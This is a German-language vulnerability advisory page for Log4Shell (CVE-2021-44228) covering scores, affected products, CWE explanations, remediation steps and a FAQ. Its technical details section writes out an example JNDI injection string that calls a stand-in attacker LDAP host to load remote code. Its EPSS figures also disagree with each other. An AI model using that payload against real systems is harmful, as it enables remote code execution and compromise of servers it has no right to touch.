CVE-2021-44228

CRITICAL(10.0)KEVRansomwareWahrscheinlich ausgenutzt

Apache Log4j2 Remote Code Execution Vulnerability

Beschreibung

CVE-2021-44228, auch bekannt als Log4Shell, ist eine kritische Expression Language Injection-Schwachstelle in Apache Log4j2. Die Schwachstelle betrifft die JNDI-Funktionalität in Log4j2 Versionen 2.0-beta9 bis 2.15.0 und ermöglicht es einem Angreifer ohne Authentifizierung, über manipulierte Log-Nachrichten beliebigen Code von einem angreifergesteuerten LDAP-Server zu laden und auszuführen. Mit dem maximal möglichen CVSS 3.1-Score von 10.0 (CRITICAL) stellt CVE-2021-44228 eine der schwerwiegendsten Schwachstellen der letzten Jahrzehnte dar. CISA hat die aktive Ausnutzung bestätigt und diese Log4j2-Schwachstelle ist bekannt für den Einsatz in Ransomware-Kampagnen. Der EPSS-Score von 94,36 % (99,96. Perzentile) bestätigt die massive Ausnutzung in der Praxis.

KEV-Informationen

Hersteller
Apache
Produkt
Log4j2
Hinzugefügt am
10. Dezember 2021
Fälligkeitsdatum
24. Dezember 2021
Erforderliche Maßnahme
For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.

CVSS-Score

Vektorstring
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HIm Rechner öffnen
Angriffsvektor
NETWORK
Angriffskomplexität
LOW
Erforderliche Privilegien
NONE
Benutzerinteraktion
NONE
Scope
CHANGED
Vertraulichkeitsauswirkung
HIGH
Integritätsauswirkung
HIGH
Verfügbarkeitsauswirkung
HIGH
Ausnutzbarkeitsscore
3.9
Auswirkungsscore
6.0

CWEs

Betroffene Produkte

HerstellerProduktVersion
siemens6bk1602-0aa12-0tp0 firmware< 2.7.0
siemens6bk1602-0aa22-0tp0 firmware< 2.7.0
siemens6bk1602-0aa32-0tp0 firmware< 2.7.0
siemens6bk1602-0aa42-0tp0 firmware< 2.7.0
siemens6bk1602-0aa52-0tp0 firmware< 2.7.0
apachelog4j>= 2.0.1, < 2.3.1; >= 2.4.0, < 2.12.2; >= 2.13.0, < 2.15.0; 2.0
siemenssppa-t3000 ses3000 firmwareAlle Versionen
siemenscapital< 2019.1; 2019.1
siemenscomos< 10.4.2
siemensdesigo cc advanced reports3.0; 4.0; 4.1; 4.2; 5.0; 5.1
siemensdesigo cc info center5.0; 5.1
siemense-car operation center< 2021-12-13
siemensenergy engage3.1
siemensenergyip8.5; 8.6; 8.7; 9.0
siemensenergyip prepay< 3.8.0.12
siemensgma-manager< 8.6.2j-398
siemenshead-end system universal device integration systemAlle Versionen
siemensindustrial edge managementAlle Versionen
siemensindustrial edge management hub< 2021-12-13
siemenslogo\! soft comfortAlle Versionen

Mehrere CVSS-Bewertungen

Quelle: [email protected](Primary)
10.0
CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Quelle: 134c704f-9b21-4f2e-91b3-4a467353bcc0(Secondary)
10.0
CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Referenzen

Schwachstellentyp

CWE-917: Unsachgemäße Neutralisierung spezieller Elemente in einer Expression-Language-Anweisung ('Expression Language Injection')

Expression Language Injection tritt auf, wenn Software EL-Anweisungen unter Verwendung extern beeinflusster Eingaben konstruiert, ohne spezielle Elemente zu neutralisieren. In Apache Log4j2 wird die JNDI-Lookup-Funktionalität (${jndi:ldap://...}) in Log-Nachrichten ausgewertet, wodurch Angreifer über manipulierte Eingaben Remote Code Execution erreichen können. Diese Schwachstelle ist besonders gefährlich, da scheinbar harmlose Log-Nachrichten die Codeausführung auslösen.

Weitere Informationen: CWE-917 — Unsachgemäße Neutralisierung spezieller Elemente in einer Expression-Language-Anweisung ('Expression Language Injection')

CWE-502: Deserialisierung nicht vertrauenswürdiger Daten

Deserialisierung nicht vertrauenswürdiger Daten tritt auf, wenn eine Anwendung Daten aus nicht vertrauenswürdigen Quellen deserialisiert. Bei Log4Shell lädt Log4j2 über JNDI-Lookups Java-Klassen von angreifergesteuerten LDAP-Servern, die bei der Instanziierung beliebigen Code ausführen können.

Weitere Informationen: CWE-502 — Deserialisierung nicht vertrauenswürdiger Daten

CWE-400: Unkontrollierter Ressourcenverbrauch

Unkontrollierter Ressourcenverbrauch ermöglicht es Angreifern, Systemressourcen zu erschöpfen. Die JNDI-Lookup-Funktionalität in Log4j2 kann für DNS-basierte Exfiltration und Denial-of-Service-Angriffe missbraucht werden.

Weitere Informationen: CWE-400 — Unkontrollierter Ressourcenverbrauch

CWE-20: Unsachgemäße Eingabevalidierung

Unsachgemäße Eingabevalidierung liegt zugrunde, wenn Log4j2 Log-Nachrichten mit eingebetteten JNDI-Lookups verarbeitet, ohne die Eingaben auf bösartige Inhalte zu prüfen.

Weitere Informationen: CWE-20 — Unsachgemäße Eingabevalidierung

Auswirkungsanalyse

CVE-2021-44228 hat den maximal möglichen CVSS 3.1-Score von 10.0 (CRITICAL) und stellt eine beispiellose Bedrohung für die globale IT-Infrastruktur dar. Die Schwachstelle ist über das Netzwerk ausnutzbar (Attack Vector: NETWORK) bei geringer Angriffskomplexität (Attack Complexity: LOW), erfordert keine Authentifizierung (Privileges Required: NONE) und keine Benutzerinteraktion (User Interaction: NONE). Der erweiterte Geltungsbereich (Scope: CHANGED) bedeutet, dass die Kompromittierung weit über die Log4j2-Bibliothek hinaus auf das gesamte System übergreifen kann. Vertraulichkeit (High): Vollständiger Zugriff auf alle Daten des kompromittierten Systems. Integrität (High): Beliebige Codeausführung ermöglicht jede Form von Datenmanipulation. Verfügbarkeit (High): Systeme können vollständig funktionsunfähig gemacht oder für Ransomware-Angriffe genutzt werden. Die Kombination aus bekanntem Ransomware-Einsatz, maximaler CVSS-Bewertung und dem EPSS-Score von 94,36 % macht diese Schwachstelle zur höchsten Priorität für jede Organisation.

Exploit-Reifegrad

Umfangreicher öffentlicher Exploit-Code ist verfügbar für CVE-2021-44228 über zahlreiche Quellen, darunter Packet Storm Security mit vollständigen Remote Code Execution-Exploits, VMware vCenter-spezifische Exploits, UniFi-spezifische Exploits und MobileIron-Exploits. CISA hat die aktive Ausnutzung bestätigt und Log4Shell ist bekannt für den Einsatz in Ransomware-Kampagnen. Die Behebungsfrist wurde auf den extrem kurzen Zeitraum bis 2021-12-24 gesetzt. Der EPSS-Score von 94,36 % (99,96. Perzentile) bestätigt die massive, weltweite Ausnutzung. Log4Shell wurde innerhalb von Stunden nach der Veröffentlichung massenhaft ausgenutzt und bleibt eine der am häufigsten angegriffenen Schwachstellen.

Behebung

  1. Pflichtmaßnahme laut CISA KEV: Für alle betroffenen Software-Assets, für die Updates existieren, sind die einzigen akzeptablen Maßnahmen: 1) Updates anwenden; ODER 2) betroffene Assets aus dem Netzwerk entfernen. Temporäre Mitigationen sind nur akzeptabel, bis Updates verfügbar sind.
  2. Aktualisieren Sie Apache Log4j2 auf Version 2.17.1 oder höher (bzw. 2.12.4 für Java 7 oder 2.3.2 für Java 6). Beachten Sie, dass Versionen 2.15.0 und 2.16.0 weitere Schwachstellen enthielten und nicht ausreichend sind. Prüfen Sie alle Anwendungen, die Log4j2 als Abhängigkeit nutzen, einschließlich Siemens-Produkte und andere Drittanbieter-Software.
  3. Falls ein sofortiges Update nicht möglich ist, entfernen Sie die JndiLookup-Klasse aus dem Classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. Setzen Sie alternativ die Systemeigenschaft log4j2.formatMsgNoLookups=true (nur für Versionen >= 2.10).
  4. Implementieren Sie Netzwerksegmentierung, um ausgehende LDAP/RMI-Verbindungen von Anwendungsservern zu blockieren. Überwachen Sie DNS-Anfragen und Netzwerkverkehr auf Exfiltrationsversuche und verdächtige JNDI-Lookup-Muster.
  5. Führen Sie eine umfassende Inventarisierung aller Log4j2-Installationen in Ihrer Umgebung durch, einschließlich transitiver Abhängigkeiten in Java-Anwendungen. Implementieren Sie langfristig Software Composition Analysis (SCA), um Schwachstellen in Abhängigkeiten frühzeitig zu erkennen.

Technische Details

CVE-2021-44228 betrifft Apache Log4j2 Versionen 2.0-beta9 bis 2.15.0 (ausgenommen Sicherheitsreleases 2.12.2, 2.12.3 und 2.3.1). Die Schwachstelle liegt in der JNDI-Lookup-Funktionalität, die in Konfigurationen, Log-Nachrichten und Parametern verwendet wird. Wenn eine Anwendung eine Zeichenkette wie ${jndi:ldap://attacker.com/exploit} loggt, löst Log4j2 einen JNDI-Lookup gegen den angegebenen LDAP-Server aus, lädt die zurückgegebene Java-Klasse und instanziiert sie, was zur Ausführung von beliebigem Code führt. Der CVSS-Vektor CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H spiegelt die maximale Ausnutzbarkeit wider: netzwerkbasiert, trivial in der Durchführung, ohne Authentifizierung oder Benutzerinteraktion, mit erweitertem Scope. Die Kombination aus CWE-917 (Expression Language Injection), CWE-502 (Deserialisierung), CWE-400 (Ressourcenverbrauch) und CWE-20 (Eingabevalidierung) verdeutlicht die mehrschichtige Natur des Problems.

Häufig gestellte Fragen

Wird CVE-2021-44228 aktiv ausgenutzt?

Ja. CVE-2021-44228 (Log4Shell) wird massiv und weltweit aktiv ausgenutzt. CISA hat die Schwachstelle in den Known Exploited Vulnerabilities-Katalog aufgenommen und ihre Ausnutzung in Ransomware-Kampagnen bestätigt. Der EPSS-Score von 94,36 % (99,96. Perzentile) bestätigt die anhaltend massive Ausnutzung.

Welche Produkte sind von CVE-2021-44228 betroffen?

CVE-2021-44228 betrifft Apache Log4j2 in den Versionen 2.0-beta9 bis 2.15.0 (ausgenommen 2.12.2, 2.12.3 und 2.3.1). Da Log4j2 eine der am weitesten verbreiteten Java-Logging-Bibliotheken ist, sind zahlreiche Produkte betroffen, darunter Apache-Produkte, Siemens-Industriesteuerungen, VMware, Cisco und viele weitere.

Wie behebe ich CVE-2021-44228?

Aktualisieren Sie Log4j2 auf Version 2.17.1 oder höher. Falls ein sofortiges Update nicht möglich ist, entfernen Sie die JndiLookup-Klasse aus dem Classpath oder setzen Sie log4j2.formatMsgNoLookups=true. Blockieren Sie ausgehende LDAP/RMI-Verbindungen auf Netzwerkebene.

Wie schwerwiegend ist CVE-2021-44228?

CVE-2021-44228 hat den maximal möglichen CVSS 3.1-Score von 10.0 (CRITICAL) und wird allgemein als eine der schwerwiegendsten Schwachstellen der IT-Geschichte angesehen. Die triviale Ausnutzbarkeit, die massive Verbreitung von Log4j2 und der bestätigte Einsatz in Ransomware-Kampagnen machen diese Schwachstelle zur höchsten Priorität.

CVSS-Score

10.0
CRITICAL(10.0)

EPSS-Score

EPSS-Score100.00%
EPSS-Perzentil100.0%

Daten

Veröffentlicht10. Dezember 2021
Zuletzt geändert11. August 2026
StatusAnalyzed
CVSS-Versionv3.1

Hilfe beim Schwachstellenmanagement?

Unsere Sicherheitsexperten helfen Ihnen bei der Priorisierung und Behebung von Schwachstellen.